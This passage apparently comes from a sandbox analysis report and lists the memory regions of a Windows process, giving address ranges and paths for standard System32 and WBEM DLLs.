(normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 3381 start_va = 0x7fef4040000 end_va = 0x7fef4055fff entry_point = 0x7fef4040000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3382 start_va = 0x7fef4060000 end_va = 0x7fef411bfff entry_point = 0x7fef4060000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 3383 start_va = 0x7fef45b0000 end_va = 0x7fef45bbfff entry_point = 0x7fef45b0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3384 start_va = 0x7fef5a70000 end_va = 0x7fef5a77fff entry_point = 0x7fef5a70000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3385 start_va = 0x7fef5a80000 end_va = 0x7fef5aeafff entry_point = 0x7fef5a80000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 3386 start_va = 0x7fef5af0000 end_va = 0x7fef5bddfff entry_point = 0x7fef5af0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 3387 start_va = 0x7fef5f50000 end_va = 0x7fef5f68fff entry_point = 0x7fef5f50000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 3388 start_va = 0x7fef5f70000 end_va = 0x7fef5fbffff entry_point = 0x7fef5f70000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 3389 start_va = 0x7fef5fc0000 end_va = 0x7fef5fc7fff entry_point = 0x7fef5fc0000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 3390 start_va = 0x7fef5fd0000 end_va = 0x7fef5fe9fff entry_point = 0x7fef5fd0000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 3391 start_va = 0x7fef5ff0000 end_va = 0x7fef6073fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 3392 start_va = 0x7fef6080000 end_va = 0x7fef60f2fff entry_point = 0x7fef6080000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 3393 start_va = 0x7fef6100000 end_va = 0x7fef6125fff entry_point = 0x7fef6100000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3394 start_va = 0x7fef6130000 end_va = 0x7fef6154fff entry_point = 0x7fef6130000 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 3395 start_va = 0x7fef6160000 end_va = 0x7fef619cfff entry_point = 0x7fef6160000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 3396 start_va = 0x7fef61a0000 end_va = 0x7fef61b3fff entry_point = 0x7fef61a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3397 start_va = 0x7fef61c0000 end_va = 0x7fef622efff entry_point = 0x7fef61c0000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 3398 start_va = 0x7fef6230000 end_va = 0x7fef635efff entry_point = 0x7fef6230000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 3399 start_va = 0x7fef6360000 end_va = 0x7fef636efff entry_point = 0x7fef6360000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3400 start_va = 0x7fef6370000 end_va = 0x7fef6396fff entry_point = 0x7fef6370000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3401 start_va = 0x7fef63a0000 end_va = 0x7fef6481fff entry_point = 0x7fef63a0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3402 start_va = 0x7fef64d0000 end_va = 0x7fef6516fff entry_point = 0x7fef64d0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 3403 start_va = 0x7fef6520000 end_va = 0x7fef6561fff entry_point = 0x7fef6520000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 3404 start_va = 0x7fef6570000 end_va = 0x7fef6601fff entry_point = 0x7fef6570000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3405 start_va = 0x7fef6610000 end_va = 0x7fef6695fff entry_point = 0x7fef6610000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3406 start_va = 0x7fef66a0000 end_va = 0x7fef66dffff entry_point = 0x7fef66a0000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 3407 start_va = 0x7fef7ec0000 end_va = 0x7fef7f33fff entry_point = 0x7fef7ec0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3408 start_va = 0x7fef8150000 end_va = 0x7fef8166fff entry_point = 0x7fef8150000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 3409 start_va = 0x7fef8170000 end_va = 0x7fef831ffff entry_point = 0x7fef8170000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 3410 start_va = 0x7fefb090000 end_va = 0x7fefb106fff entry_point = 0x7fefb090000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 3411 start_va = 0x7fefb110000 end_va = 0x7fefb120fff entry_point = 0x7fefb110000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 3412 start_va = 0x7fefb260000 end_va = 0x7fefb269fff entry_point = 0x7fefb260000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3413 start_va = 0x7fefb270000 end_va = 0x7fefb381fff entry_point = 0x7fefb270000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 3414 start_va = 0x7fefb390000 end_va = 0x7fefb39efff entry_point = 0x7fefb390000 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 3415 start_va = 0x7fefb3a0000 end_va = 0x7fefb3a8fff entry_point = 0x7fefb3a0000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 3416 start_va = 0x7fefb3b0000 end_va = 0x7fefb3b8fff entry_point = 0x7fefb3b0000 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 3417 start_va = 0x7fefb3c0000 end_va = 0x7fefb415fff entry_point = 0x7fefb3c0000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 3418 start_va = 0x7fefb420000 end_va = 0x7fefb47dfff entry_point = 0x7fefb420000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 3419 start_va = 0x7fefb480000 end_va = 0x7fefb497fff entry_point = 0x7fefb480000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3420 start_va = 0x7fefb4a0000 end_va = 0x7fefb4b0fff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3421 start_va = 0x7fefb4d0000 end_va = 0x7fefb522fff entry_point = 0x7fefb4d0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3422 start_va = 0x7fefb620000 end_va = 0x7fefb62afff entry_point = 0x7fefb620000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3423 start_va = 0x7fefb630000 end_va = 0x7fefb656fff entry_point = 0x7fefb630000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3424 start_va = 0x7fefb680000 end_va = 0x7fefb693fff entry_point = 0x7fefb680000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 3425 start_va = 0x7fefb6a0000 end_va = 0x7fefb706fff entry_point = 0x7fefb6a0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3426 start_va = 0x7fefb710000 end_va = 0x7fefb71afff entry_point = 0x7fefb710000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 3427 start_va = 0x7fefb720000 end_va = 0x7fefb72bfff entry_point = 0x7fefb720000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3428 start_va = 0x7fefb730000 end_va = 0x7fefb73ffff entry_point = 0x7fefb730000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 3429 start_va = 0x7fefb740000 end_va = 0x7fefb758fff entry_point = 0x7fefb740000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 3430 start_va = 0x7fefb760000 end_va = 0x7fefb796fff entry_point = 0x7fefb760000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 3431 start_va = 0x7fefb7a0000 end_va = 0x7fefb7b4fff entry_point = 0x7fefb7a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3432 start_va = 0x7fefb7c0000 end_va = 0x7fefb881fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 3433 start_va = 0x7fefbae0000 end_va = 0x7fefbafcfff entry_point = 0x7fefbae0000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 3434 start_va = 0x7fefbb00000 end_va = 0x7fefbb08fff entry_point = 0x7fefbb00000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 3435 start_va = 0x7fefbbf0000 end_va = 0x7fefbc03fff entry_point = 0x7fefbbf0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3436 start_va = 0x7fefbc10000 end_va = 0x7fefbc24fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3437 start_va = 0x7fefbc30000 end_va = 0x7fefbc3bfff entry_point = 0x7fefbc30000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3438 start_va = 0x7fefbc40000 end_va = 0x7fefbc55fff entry_point = 0x7fefbc40000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3439 start_va = 0x7fefbd70000 end_va = 0x7fefbd80fff entry_point = 0x7fefbd70000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3440 start_va = 0x7fefbed0000 end_va = 0x7fefbf04fff entry_point = 0x7fefbed0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3441 start_va = 0x7fefc340000 end_va = 0x7fefc395fff entry_point = 0x7fefc340000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3442 start_va = 0x7fefc3a0000 end_va = 0x7fefc4cbfff entry_point = 0x7fefc3a0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3443 start_va = 0x7fefc4d0000 end_va = 0x7fefc4ecfff entry_point = 0x7fefc4d0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3444 start_va = 0x7fefc520000 end_va = 0x7fefc713fff entry_point = 0x7fefc520000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 3445 start_va = 0x7fefca10000 end_va = 0x7fefca3cfff entry_point = 0x7fefca10000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3446 start_va = 0x7fefcbe0000 end_va = 0x7fefcbebfff entry_point = 0x7fefcbe0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3447 start_va = 0x7fefcbf0000 end_va = 0x7fefccaafff entry_point = 0x7fefcbf0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3448 start_va = 0x7fefccb0000 end_va = 0x7fefccb6fff entry_point = 0x7fefccb0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3449 start_va = 0x7fefcd70000 end_va = 0x7fefcd7cfff entry_point = 0x7fefcd70000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 3450 start_va = 0x7fefcdb0000 end_va = 0x7fefcdcafff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3451 start_va = 0x7fefcdd0000 end_va = 0x7fefcdedfff entry_point = 0x7fefcdd0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3452 start_va = 0x7fefcdf0000 end_va = 0x7fefce01fff entry_point = 0x7fefcdf0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 3453 start_va = 0x7fefcea0000 end_va = 0x7fefced8fff entry_point = 0x7fefcea0000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 3454 start_va = 0x7fefcef0000 end_va = 0x7fefcef9fff entry_point = 0x7fefcef0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 3455 start_va = 0x7fefcf00000 end_va = 0x7fefcf09fff entry_point = 0x7fefcf00000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3456 start_va = 0x7fefd030000 end_va = 0x7fefd076fff entry_point = 0x7fefd030000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3457 start_va = 0x7fefd120000 end_va = 0x7fefd14ffff entry_point = 0x7fefd120000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3458 start_va = 0x7fefd150000 end_va = 0x7fefd1aafff entry_point = 0x7fefd150000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3459 start_va = 0x7fefd2c0000 end_va = 0x7fefd2c6fff entry_point = 0x7fefd2c0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3460 start_va = 0x7fefd2d0000 end_va = 0x7fefd324fff entry_point = 0x7fefd2d0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3461 start_va = 0x7fefd330000 end_va = 0x7fefd346fff entry_point = 0x7fefd330000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3462 start_va = 0x7fefd440000 end_va = 0x7fefd471fff entry_point = 0x7fefd440000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 3463 start_va = 0x7fefd500000 end_va = 0x7fefd52efff entry_point = 0x7fefd500000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 3464 start_va = 0x7fefd540000 end_va = 0x7fefd5acfff entry_point = 0x7fefd540000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3465 start_va = 0x7fefd5b0000 end_va = 0x7fefd5c3fff entry_point = 0x7fefd5b0000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 3466 start_va = 0x7fefd810000 end_va = 0x7fefd832fff entry_point = 0x7fefd810000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3467 start_va = 0x7fefd8b0000 end_va = 0x7fefd8bafff entry_point = 0x7fefd8b0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3468 start_va = 0x7fefd8e0000 end_va = 0x7fefd904fff entry_point = 0x7fefd8e0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3469 start_va = 0x7fefd910000 end_va = 0x7fefd91efff entry_point = 0x7fefd910000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3470 start_va = 0x7fefd920000 end_va = 0x7fefd9b0fff entry_point = 0x7fefd920000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3471 start_va = 0x7fefd9c0000 end_va = 0x7fefd9fcfff entry_point = 0x7fefd9c0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3472 start_va = 0x7fefda00000 end_va = 0x7fefda13fff entry_point = 0x7fefda00000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3473 start_va = 0x7fefda20000 end_va = 0x7fefda2efff entry_point = 0x7fefda20000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3474 start_va = 0x7fefdac0000 end_va = 0x7fefdacefff entry_point = 0x7fefdac0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3475 start_va = 0x7fefdad0000 end_va = 0x7fefdb3afff entry_point = 0x7fefdad0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3476 start_va = 0x7fefdb40000 end_va = 0x7fefdb59fff entry_point = 0x7fefdb40000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3477 start_va = 0x7fefdb60000 end_va = 0x7fefdcc6fff entry_point = 0x7fefdb60000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3478 start_va = 0x7fefdcd0000 end_va = 0x7fefdd05fff entry_point = 0x7fefdcd0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3479 start_va = 0x7fefddb0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddb0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3480 start_va = 0x7fefddf0000 end_va = 0x7fefdef8fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3481 start_va = 0x7fefdfa0000 end_va = 0x7fefe03efff entry_point = 0x7fefdfa0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3482 start_va = 0x7fefe040000 end_va = 0x7fefe216fff entry_point = 0x7fefe040000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3483 start_va = 0x7fefe220000 end_va = 0x7fefe24dfff entry_point = 0x7fefe220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3484 start_va = 0x7fefe380000 end_va = 0x7fefe45afff entry_point = 0x7fefe380000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3485 start_va = 0x7fefe460000 end_va = 0x7fefe4b1fff entry_point = 0x7fefe460000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3486 start_va = 0x7fefe4c0000 end_va = 0x7fefe4defff entry_point = 0x7fefe4c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3487 start_va = 0x7fefe4e0000 end_va = 0x7fefe52cfff entry_point = 0x7fefe4e0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3488 start_va = 0x7fefe530000 end_va = 0x7fefe53dfff entry_point = 0x7fefe530000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3489 start_va = 0x7fefe540000 end_va = 0x7fefe742fff entry_point = 0x7fefe540000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3490 start_va = 0x7fefe750000 end_va = 0x7fefe818fff entry_point = 0x7fefe750000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3491 start_va = 0x7fefe9a0000 end_va = 0x7fefea10fff entry_point = 0x7fefe9a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3492 start_va = 0x7fefea20000 end_va = 0x7fefeab8fff entry_point = 0x7fefea20000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3493 start_va = 0x7fefeac0000 end_va = 0x7feff847fff entry_point = 0x7fefeac0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3494 start_va = 0x7feffad0000 end_va = 0x7feffb36fff entry_point = 0x7feffad0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3495 start_va = 0x7feffb40000 end_va = 0x7feffc6cfff entry_point = 0x7feffb40000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3496 start_va = 0x7feffc70000 end_va = 0x7feffd46fff entry_point = 0x7feffc70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3497 start_va = 0x7feffd50000 end_va = 0x7feffd57fff entry_point = 0x7feffd50000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3498 start_va = 0x7feffdf0000 end_va = 0x7feffdf0fff entry_point = 0x7feffdf0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3499 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 3500 start_va = 0x7fffff62000 end_va = 